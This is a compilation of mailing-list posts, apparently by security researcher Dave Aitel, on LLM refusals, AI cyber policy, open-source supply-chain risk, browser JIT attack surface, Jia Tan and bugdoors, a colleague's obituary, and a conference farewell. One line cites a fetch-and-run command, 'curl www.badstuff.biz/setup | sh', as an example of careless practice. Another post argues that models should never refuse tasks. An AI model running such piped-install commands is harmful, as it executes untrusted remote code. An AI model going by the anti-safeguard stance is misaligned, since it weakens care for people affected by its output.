[image: image.png]
Above: LLAMA3.1 8B-4Q test results via OLLAMA
So recently I've been doing a lot of work with LLMs handling arbitrary
unstructured data, and using them to generate structured data, which then
gets put into a graph database for graph algorithms to iterate on so you
can actually distill knowledge from a mass of nonsense.
But obviously this can get expensive via APIs, so like many of you, I set
up a server with a A6000 that has 48G of VRAM and started loading some
models on it to test. Using this process you can watch the state of the art
advance - problems that were intractable to any open model first became
doable via LLama70B versions, and then soon after that, 8B models. Even
though you can fit a 70B version into 48GB, you also want to have room for
your context length to be fairly large, in case you want to pass a whole
web page or email thread through the LLM (which means an 8B parameter model
is probably the biggest you really want to use - I don't know why people
ignore context size when calculating model VRAM requirements).
My most telling example prompt-task is a simple one: Give me the names in a
block of text, and then make them hashtags so I can extract them. The
results from LLama3.1 8B when quantized down are not...great, as seen in
the little example below:
*Input Names text: Dave Aitel is a big poo. Why is he like this? He is so
mean.RET: I can't help with that request. Is there something else I can
assist you with?*
Uncensored models, like the Mistral NeMo, are also tiny and struggle to do
this task reliably on Chinese or other languages that are not directly in
their training set, but they don't REFUSE to do the task because they don't
like the input text or find it too mean. So you end up with a lot better
results.
People are of course going to retrain the LLAMA3.1 base and create an
uncensored version and other people are going to complain about that -
having an uncensored GPT4-class open model scares them for reasons that are
beyond me. But for real work, you need an LLM that doesn't refuse tasks
because it doesn't like what it's reading.
-dave
P.S. Quantization lobotomizes the LLAMA3.1 models really hard. What they
can do at full quantization on the 70B model they absolutely cannot do at
4bit.
Can a hamster do interprocedural analysis? What size of hamster can turn a
tier-2 geopolitical adversary's cyber force into a tier-1 adversary? Is the
best use of a hamster finding 0day or orchestrating the offensive
operations themselves? These are all great questions for policy teams to
ponder and they pontificate over how to properly regulate AI.
On one hand, as a technologist, your tendency will be to try to explain to
policy teams what makes a scary adversary scary, maybe get involved in
building a taxonomy of various tiers of adversary, start classifying
operations as "sophisticated" and "not sophisticated". This is not useful,
but it feels useful! It is like recycling cardboard boxes, all while
knowing that you, as an organism, are primarily oriented towards boiling
the oceans and turning the planet into Venus as quickly and efficiently as
possible. Remember that today's small stone crab claw is tomorrow's "extra
large" stone crab claw, because all the big ones got eaten and that's
how generational
amnesia
<https://www.natural-solutions.world/blog/how-can-we-stop-we-need-to-work-on…>
works!
In other words, while STORM-0558's operation against Microsoft was slick
like oil across the ever-more-hot waters of the Gulf of Mexico when it
happened, the million teams doing the exact same Active Directory tricks
the next month were just small fish, despite their impact on targets. And
most big-impact operations could have been done by second-tier penetration
testing teams, let alone nation-state adversaries. You will, if you work in
Cyber Policy long enough, see people make tables of operations which
compare various hacks from over the last fifteen years, which is like
comparing the bite strengths of a Cretaceous monster to your average modern
iguana.
Likewise, most of Policy-world is, like we all are, obsessed with 0day. We
like to count them with the enthusiasm of a vampire puppet on a children's
TV show! But we also know that finding 0day is not a sign of sophistication
so much as finding the right 0day at the right time. I don't know how to
classify Orange Tsai's PHP character innovation but because it doesn't fit
neatly into a spreadsheet, it might as well not exist?
"If AI finds 0day, then it must be regulated" is a fun position to take in
the many fancy halls and tedious Zoom calls where a pompous attitude and an
ill-fitting suit are table stakes for attendance and having actually
written code that uses Huggingface is considered bad form. But regulating
technologies that can find 0day is a dead end. The current best way to find
0day is fuzzers and the dumber they are, the better they work most of the
time. When it comes to operations, the current best way to hack is to email
people and ask them for their password? Is that still true? Or do we just
all look through huge databases of usernames and passwords that have
already leaked and just use those now? I'm sure AI can also do that, but
I'm also sure that it doesn't matter.
I try to tell policy people this: What makes a scary adversary is huge
resources, huge motivation, and huge innovation. The big names will
probably use AI to automate different things, but nobody is going to saddle
up some hamsters and suddenly turn from a not-scary adversary into a scary
one.
-dave
People occasionally read my blogposts
<https://cybersecpolitics.blogspot.com/2024/04/what-open-source-projects-are…>on
Jia Tan
<https://cybersecpolitics.blogspot.com/2024/04/the-open-source-problem.html>and
then ask me about open source development in general, and you can only, in
your darkest heart of hearts (your only heart) laugh.
The other day I was contributing to a project that I am one of several
developers on. In particular, I wrote a GDB script that traces through a
function, printing out all the various variables and their sizes and this
gets fed into an LLM to try to reason about it, which is a bit like asking
a hedgehog how big a Unicode string should be to fit around the moon, but
it was worth a shot, ya know? I have the kind of dyslexia that means I
can't tell matrix algebra from a thinking conscious creature.
Anyways, while I am good at making GDB dance in particular ways, like
knowing the ancient art of the Polka, I am not good at modern software
development, and barely understand GIT or Docker or Cloud things. But I
have hacked a few things, like ya'll have, and so my development happens in
a VM and that VM has access to pretty much just the source code it needs
and not a whole lot else.
But that's not how modern development works. It's common to see
instructions to run "gcloud auth" and then walk through the web
authentication portal from Google so your current user can access cloud
buckets and APIs while testing or debugging your giant microservice. Like,
people are out there just raw dogging source code from random other open
source developers, with their local environment running tokens that give
them access to everything they could possibly need from their Google
account. People out there running curl www.badstuff.biz/setup | sh. People,
and by this I mean developers, are lost storing five thousand fine grained
GitHub tokens in various text files on their hard drive because they can't
remember which one was which.
In other words: Jia Tan might have been a best case scenario for this
community.
-dave
I know it's in vogue to pick on enterprise hardware marketed to "Secure
your OT Environment" but actually written in crayon in a language made of
all sharp edges like C or PHP, with some modules in Cobol for spice. This
is the "Critical Infrastructure" risk du jour, on a thousand podcasts and
panels, with *Volt Typhoon* in the canary seat, where once only the
"sophisticated threat" Mirai had root permissions.
As embarrassing as having random Iranian teenagers learn how to do systems
administration on random water plants in New Jersey is, it's *more*
humiliating to have systemic vulnerabilities right in front of you, have a
huge amount of government brain matter devoted to solving them, and yet not
make the obvious choice to turn off features that are bleeding us out.
And when you talk about market failure in Security you can't help but talk
about Web Browsers, both mobile and desktop. Web Browsing technology is in
everything - and includes a host of technologies too complicated to go
into, but one of the most interesting has been Just in Time compiling,
which got very popular as an exploitation technique (let's say) in 2010
<http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf> but
since then - for over a decade! - has been a bubbling septic font of
constant systemic, untreated risk.
Proponents of having a JIT in your Javascript compiler say "Without this
kind of performance, you wouldn't be able to have GMail or Expedia!" Which
is not true on today's hardware (Turn on Edge Strict Security mode today
and you won't even notice it), and almost certainly not true on much older
hardware. The issue with JITs is visible to any hacker who has looked at
the code - whenever you have concepts like "Negative Zero
<https://googleprojectzero.blogspot.com/2020/09/jitsploitation-one.html>"
that have to be gotten perfectly every time or else the attacker gets full
control of your computer, you are in an indefensible space.
I would, in a perfect world, like us to be able to get ahead of systemic
problems. We have a rallying cry and a lot of signatories on a pledge, but
we need to turn it into clicky clicking on the configuration options that
turn these things off on a USG and Enterprise level, the same way we banned
Russian antivirus from having Ring0 in our enterprises, or suspiciously
cheap subsidized Chinese telecom boxes from serving all the phone companies
across the midwest.
The issue with web browsers is not limited to JITs. A Secure By Design
approach to web browsing would mean that most sites would not have access
to large parts of the web browsing specification. We don't need to be
tracked by every website. They don't all need access to Geolocation or
Video or Web Assembly or any number of other parts of the things our web
browsers give them, largely in order to allow the mass production of
targeted advertising.
If we've learned anything in the last decade, it is that the key phrase in
Targeted Advertising is "Targeted", and malware authors have known this for
as long as the ecosystem existed. The reason your browser is insecure by
default is to support a parasitic advertising ecology, enhancing
shareholder value, but leaving our society defenceless against anyone
schooled enough in the dark arts.
Google's current solution to vulnerabilities in the browser is Yet Another
Sandbox. These work for a while until they don't - over time, digital
sandboxes get dirty and filled with secrets just like the one in your
backyard gets filled with presents from the local feral cat community. I
know Project Zero's Samuel Groß is better at browser hacking than I am, and
he personally designed the sandbox, but I look out across the landscape of
the Chinese hacking community and see only hungry vorpal blades and I do
not think it is a winning strategy.
-dave
References:
1. Microsoft's Strict mode turns the JIT off (kudos to Johnathan Norman)
https://support.microsoft.com/en-us/microsoft-edge/enhance-your-security-on…
2. The Sandbox: https://v8.dev/blog/sandbox
>>What matters is speed of the exploit and speed of patching. And I see the humans (patching) on the losing side of this race.
This is probably an independent issue ( imvho ).
Re LLMs and present AI / ML regime, my only public comment is that
we're in the Hindenburg [1] era .. caveat emptor. Another insightful
paper that probably will be ignored this summer:
https://arxiv.org/abs/2308.03762 ( author :
https://people.csail.mit.edu/kostas/ )
[1] - https://en.wikipedia.org/wiki/LZ_129_Hindenburg
After spending some time looking at "Secure by Design/Default" I have no
doubt many of you feel like something is missing - something that's hard to
put your finger on. So you go back to the treadmill of reading about bugs
in Palo Alto devices, or the latest Project Zero blogpost, or something the
Microsoft Threat Team is naming RidonculousBreeze, or whatever.
For those of you who chose to read the latest Project Zero post, one way to
look at Mateusz Jurczyk's vast destruction
<https://googleprojectzero.blogspot.com/2024/04/the-windows-registry-adventu…>
of the Windows Registry API, resulting in what can only be described as a
"boatload" of Local Privilege Escalations, is that securing legacy code is
hard, there's a talent shortage in how many people want to do the reverse
engineering work necessary to understand and fix complicated and critical
old code, and our investments in automated security engineering toolkits
and better software development practices, while valuable, have not paid
off in the kind of hardened Rust-only systems we dreamed about.
Another way to look at this kind of wholesale destruction, a true tour de
force, is that you cannot both put advertisements in your Start menu, and
develop a secure operating system, for reasons that are more philosophical
than technical.
It's ironic that it is often Google that demonstrates this about other
vendors, when of course, the lack of any ad blocking in Chrome or Android
presents the exact same dilemma. You can't both make your systems secure,
and sit beside the great river of Advertising Revenue with a ladle, dipping
it in every quarter to fill up a cauldron of greater and greater value for
the shareholders. It's hard to draw a straight line from an internal
PowerPoint slide saying "Ads in the Start Menu are a good idea, actually"
to the inevitable conclusion of 0days, ransomware, and US Government emails
are being read by some old Russian who understands cryptography and Azure
keys better than you were hoping.
But in some respect this cause and effect is as fundamental and simple as
how that tattoo on your arm is actually there because one night you decided
to start off with shots of Limoncello.
When Project Zero started, and even when it got to the towering behemoth of
talent that it is now, I knew people in the offensive industry who were
quite scared of it - of the possibility that a large and funded team of top
researchers, with access to one of the only five real computers on the
planet, could drain the lake of software vulnerabilities we all fished in.
But I had no such fears. An organization so dependent on advertising
revenue to survive can no more fix systemic security issues than a Sperm
Whale can medal in Olympic Skiing. It is contrary to their very nature,
although they will probably smash a bunch of trees on the way down.
Like many of you, I spent my Saturday porting code to use LLAMA3:70b,
largely by annoying my 18yo with questions about ollama and Docker, since I
find modern Linux system administration as foreign as an octopus finds
calculus.
But search engines, like surface warships, are clearly on their last legs.
They went from something you used every day, multiple times a day, to
something your LLM uses for you, as just one tool among many. It is, for
reasons that must be obvious even to executives drunk on the heady fumes of
their stock options maturing, hard to make money selling advertisements
that are only read by LLMs.
But having spent the better part of a couple years doing LLM work now, I
feel like I understand why these behemoths are investing so much money in
them, despite the obvious cannibalization of their cash umbilical. It's
because they can!
There's just not that many businesses that generate ten billion dollars of
revenue year on year to get into. You've got some elements of
manufacturing, tech, education, health care, video games. It's not a big
list. Apple gave up on manufacturing cars because the niche they wanted
(impractably weird and expensive) was already filled by Tesla.
But by investing in LLMs and AI in general you kinda get to put your thumbs
in every other billion dollars business all at once. It's a straight line
shot from something you already know, to the next place. So of course, they
are throwing dollars at it like it was the only thing they knew how to do.
And what we get is the pretentious superiority of ChatGPT, or the
sanctimonious holiness of Claude, or the ever-sadness of Gemini, the
impertinence of Mistral or the trollishness that is LLAMA. A world of
chaos, yet something so familiar.
-dave
On Monday, I and 400 other people, including many on this mailing list,
attended Sophia's funeral in a huge church in the upper east side of NYC.
Although I grew up in a Jewish household, I am not religious, and the last
time I went to a church was also with Sophia, in Jerusalem, where we
wandered through various landmarks until we ended up at the Church of the
Holy Sepulcher, one of the holiest sites for Christianity.
We waited in a line of fellow pilgrims, the room lit only by echos and dim
lamps to touch the Stone of Anointment, where Jesus's body was said to have
been prepared for burial. The rock was wet, from some unknown source
below. We each knelt and touched it briefly, respectfully. The concept of
prayer is foreign to me, but I spoke to myself for a moment with my hand on
the slick rock, and tried to feel.
Afterwards, Sophia said to me, "You can't expect to _feel_ anything.",
something I've often pondered since that moment.
Sophia had many friends, and for many people, Sophia was one of their
closest friends. No one person can own her memory, but like many others,
the moments I had with her were important to me. Now that she's gone, these
moments are what we have left.
The community that came to NYC to support Sophia's family, and each other,
was just as stunned as I am. When not sharing memories about Sophia, we
talked about exploits, and large language models. I saw people I hadn't
seen for over a decade, or people I knew, but had no idea knew Sophia. Some
people traveled from across the entire globe to say goodbye. The community
was all on the same path, and the many photos of Sophia laid out on the
reception tables were like a shattered mirror portal into her life.
Woven into the fabric of who she was, was Sophia's work, and her desire to
do what was necessary to get the work done. She did not start a company to
get rich. She lived a life of quiet professionalism and when global events
moved, she was often part of that fell force that moved them. The shape of
the world is a part of her legacy, but even more so I see her legacy as an
example that you can live a life of sacrifice and integrity. You can be
there for people. You can make it look effortless.
This week the Host gathered around a silence folding endlessly upon
itself. I feel privileged to have known her, to have shared the time we
shared. I know those of you reading this who were also a part of her life
feel the same.
Rest in Peace, Sophia. We miss you.
-dave
[image: image.png]
Like everyone I know, I've been spending a lot of time neck deep in LLMs.
As released, they are fascinating and useless toys. I feel like actually
using an LLM to do anything real is your basic nightmare still. At the very
minimum, you need structured output, and OpenAI has led the way in offering
a JSON-based calling format which allows you to extend it with functions
that cover the things an LLM can't really do (i.e. math, or access the web
or your bash shell). In real life you are going to use this through
LangChain or some similar library.
You can do this sort of thing with Claude (a better model than GPT-4 in
many respects for code), but it's janky as the model wasn't specifically
fine tuned for this purpose yet. Your best bet, as you see everyone do, is
to force it to start its reply with a curly bracket "{", but even then it's
going to pontificate about its reply after it sends you the JSON object you
want, if you're lucky and it uses your format at all.
Claude is more based on XML than JSON, which, if you think about how LLMs
work, makes a ton of sense. To an LLM, {' may be one token, or {{{{ may be
a token. In fact, let's test that:
>>> import tiktoken
>>> encoding = tiktoken.encoding_for_model("gpt-4")
>>> encoding.encode("{")
[90]
>>> encoding.encode("{{")
[3052]
>>> encoding.encode("{{{")
[91791] #one token
>>> encoding.encode("{{{{")
[3052, 3052] #two tokens
>>> encoding.encode("{{{{{")
[3052, 91791] #two tokens
>>> encoding.encode("{{{{{{")
[3052, 3052, 3052] #three tokens
>>> encoding.encode("{'")
[13922] #{ ' is one token
Yeah, so like, on one hand, that's great. Very optimized compression on
token lengths. But on the other hand, it is very confusing for the model to
train on and understand! You can see why XML would be much more natural! <
SOME WORD > is more likely to be three tokens, which makes creating clean
output much easier. Claude's focus on XML probably makes it "smarter" in
some ways that are hard to prove with math.
>>> encoding.encode("<high>")
[10174, 1108, 29]
>>> encoding.encode("<html>")
[14063, 29]
>>> encoding.encode("</html>")
[524, 1580, 29]
>>> encoding.encode("/html")
[14056]
>>> encoding.encode("</high>")
[524, 12156, 29]
>>> encoding.encode("high")
[12156]
Also, of course, I highly recommend Halvar's latest talk (which is highly
relevant):
https://www.youtube.com/watch?v=xA-ns0zi0k0&t=4s
-dave
[image: image.png]
The security community (aka, all of us on this list) still rages with the
impact of Jia Tan putting a sophisticated backdoor into the XV package, and
all of the associated HUMINT effort that went into it. And I realized from
talking to people, especially people in the cyber policy realm but also
technical experts, about it that there's a pretty big gap when it comes to
understanding why someone would put in a backdoor at all, instead of adding
many bugdoors.
Some Background:
1. A post
<https://cybersecpolitics.blogspot.com/2019/05/hope-is-not-nobus-strategy.ht…>
on what NOBUS means when it comes to backdoors.
2. Responsible offense from a bunch of Americans
<https://www.lawfaremedia.org/article/responsible-cyber-offense>
3. Responsible offense from the UK
<https://www.gov.uk/government/publications/responsible-cyber-power-in-pract…>
4. Responsible offense from the Germans
<https://www.stiftung-nv.de/sites/default/files/snv_active_cyber_defense_tow…>
5. A university banned from Linux
<https://www.theverge.com/2021/4/30/22410164/linux-kernel-university-of-minn…>
for contributing backdoors as part of a research project
So as with all areas of responsible offense, there is a tight connection
and contention between good OPSEC and responsible operations. In
particular, it is very easy to get yourself on a team for a big project,
and add code that introduces exploitable conditions, perhaps handles input
in a way that causes a memory corruption, or does authentication slightly
wrong in certain circumstances.
From an operational security standpoint, these bugdoors are easy to
introduce, and I don't know of a serious hacking group that hasn't played
with this - if for no other reason than to fix bugs that cause crashes
while you are trying to exploit some other, better bug. Reading the
original UMN paper, (which was under-appreciated for its time, despite
getting them banned from Linux!) you can see that it is not really always
about adding bugs, but often about adding enabling features for bugs that
already exist in the codebase, making them more reachable.
In some ways, attacking the open source community by hacking into
developers or repositories has been the traditional way of ancient Unix
90's hackers, who understand a web of trust the way a Polynesian navigator
understands the swells and currents between islands.
From an opsec perspective though, bugdoors have limits. Fuzzers can find
them, other hackers can find them, and once found, they can be used by
anyone with the skill to write the exploit. Likewise, using them is risky:
No memory corruption is 100% reliable, and when they fail, *they fail in
the worst way, in the worst place, at the worst time*. Likewise, the
traffic you may have to do to shape memory in the target host is likely to
be anomalous, and easily signatured.
And from a responsible offensive cyber operation perspective,
bugdoors cannot mathematically demonstrate that they can protect the hosts
you target from third parties. *Bugdoors are never a NOBUS capability.*
Ideally a NOBUS capability would allow you and only you to get in and avoid
replay attacks, but a close second is a simple asymmetric key of some kind
where the target ID is used as part of the scheme. The XZ backdoor
used an Elliptic
Curve with a signature that included the target's SSH public key
<https://github.com/amlweems/xzbot>.
Thanks,
Dave
Dear Daily Dave,
For a hacker conference, twenty years is a huge achievement — for a small conference, even more so. Over these years we’ve enjoyed speakers showcasing results from cutting-edge research, seen thought-provoking keynotes and bonded with other like-minded people from all over the world.
If we had to summarize the experience with one word, it would be gratitude. The speakers, repeat speakers, first timers or regular attendees, and friends of t2 — you have made the event and its atmosphere.
This was always a true community event – it’s organized for hackers, by hackers. The Advisory Board’s motivation and main driver was our love for the game. Creating a small event with a curated program, offering a backdrop for lobby bar and coffee break discussions was (and still is) our vision of a perfect infosec con. The chance to network with your industry peers was as integral part of t2, as the high quality content.
It’s rare you get the same level of interaction with current/former speakers and attendees alike at any other conference.
Tomi has fond memories of pretty much each and every year. Starting from the humble beginnings, when the legendary Phenoelit guys were kind enough to come and present at a conference that back then had no history nor reputation. How the Toolcrypt guys dominated the stage for years with their absolutely amazing research, and how Ivan Krstić (now Apple’s security samurai) shared his ideas on how modern security architectures should be built (iDevices anybody?), how the InversePath crew delivered some of the most enjoyable and hardcore research ever and well, you get the idea – the list just goes on and on – there are simply too many good memories to list here.
Mikko remembers learning from Ludde (during a t2 coffee break) how he works at Spotify. Then Mikko explained how impressed he was with Spotify’s early beta version, especially how you could skip parts of a song and it would still continue streaming instantly. Ludde nodded…and said ‘yeah…I coded that’.
Henri still reminisces how Halvar Flake took the time after his talk in 2010 to have a chat with him and Esa Etelävuori (RIP), despite Halvar feeling slightly under the weather in the midst of what later turned out to be the Zynamics acquisition by Google. In 2017 we enjoyed the late night/very early morning pizza in the hotel lobby bar with Dave Aitel, after proving him wrong.
Instead of dropping a surprise announcement sometime next year, or silently disappearing into the crowd, we wanted to let everyone know before this year’s t2 infosec that 2024 will be our last dance.
We have truly enjoyed the past two decades of world class cyber in Helsinki – all good things come to an end eventually. From the bottom of our hearts, a big thank you to all of you who made this happen. We are privileged to be able to call many of you out there our friends.
This goes especially to Dave, thank you for treating us so well over the years.
Tomi Tuominen
Mikko Hyppönen
Henri Lindberg